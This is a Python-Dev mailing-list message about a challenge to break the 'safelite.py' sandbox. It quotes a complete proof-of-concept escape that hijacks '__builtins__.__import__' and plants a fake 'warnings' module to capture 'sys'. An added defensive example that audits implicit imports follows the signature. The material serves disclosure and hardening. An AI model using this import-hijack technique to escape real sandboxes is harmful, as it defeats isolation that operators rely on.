[Python-Dev] Challenge: Please break this! [Now with blog post]
tav at espians.com
Tue Feb 24 09:27:01 CET 2009
Daniel emailed in the exploit below and it is pretty devastating. It
takes advantage of the fact that the warnings framework in 2.6+
dynamically imports modules without being explicitly called!!

I've fixed this hole in safelite.py, but would be interested to know
if there are other non-user-initiated dynamically imported modules?

Thanks Daniel for bringing this to our attention!

On Tue, Feb 24, 2009 at 4:46 AM, Daniel (ajax) Diniz <ajaksu at gmail.com> wrote:
> Here's my attempt. Uses the builtin warnings module. You might need to
> change 'args' to 'args' depending on your environment.
>
> I really don't like to post these to public MLs, but feel free to do
> so if you think no harm may arise from this one ;)
>
> from safelite import FileReader
>
> # Let's build a fake module
> warnings = __builtins__.__class__('warnings')
>
> # Fill it with deception
> warnings.default_action = "ignore"
>
> # And provide a supporting thug
> def __import__(*args):
>     try:
>         print "How nice:\n", args.keys()
>         global sys
>         sys = args['sys']
>     except Exception, v:
>         print "Exception:", v
>     return warnings
>
> # Put the bogus module at the doorstep...
> __builtins__.warnings = warnings
>
> # and have the thug replacing the doorman
> __builtins__.__import__ = __import__
>
> # An unsuspecting customer passes by...
>
> # ... and is brutally mugged :)
> print sys
> print dir(sys)

plex:espians/tav | tav at espians.com | +44 (0) 7809 569 369
http://tav.espians.com | http://twitter.com/tav | skype:tavespian
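
One way to look for the "non-user-initiated dynamically imported modules" the message asks about is to log every call that reaches `builtins.__import__` while a workload runs. This is an added Python 3 example, not code from safelite.py or from either poster; `import_audit`, `implicit_imports` and `constructed_lib` are hypothetical names, and the lazily importing library is a constructed stand-in.

```python
import builtins
import types
from contextlib import contextmanager


@contextmanager
def import_audit(log):
    """Record every call that reaches builtins.__import__ while active."""
    real_import = builtins.__import__
    def hook(name, globals=None, locals=None, fromlist=(), level=0):
        # The import statement passes the importing code's globals, so the
        # requesting module can be named; other callers may pass None.
        importer = (globals or {}).get("__name__", "<unknown>")
        log.append((importer, name))
        return real_import(name, globals, locals, fromlist, level)

    builtins.__import__ = hook
    try:
        yield log
    finally:
        builtins.__import__ = real_import  # always restore the real importer


def implicit_imports(workload, user_module="__main__"):
    """Run workload() and return imports not issued by user_module itself."""
    log = []
    with import_audit(log):
        workload()
    return sorted({(imp, name) for imp, name in log if imp != user_module})


# Constructed stand-in for a library that imports lazily at call time,
# the pattern the message describes for the warnings framework.
LIB_SRC = '''
def deprecated():
    import colorsys  # hidden import, runs only when the function is called
    return "done"
'''


def make_constructed_lib():
    lib = types.ModuleType("constructed_lib")
    exec(LIB_SRC, lib.__dict__)
    return lib


if __name__ == "__main__":
    for importer, name in implicit_imports(make_constructed_lib().deprecated):
        print(f"{importer} imported {name!r} without the caller asking")
```

Imports made through `importlib.import_module` do not pass through `builtins.__import__`, so this audit will not list them.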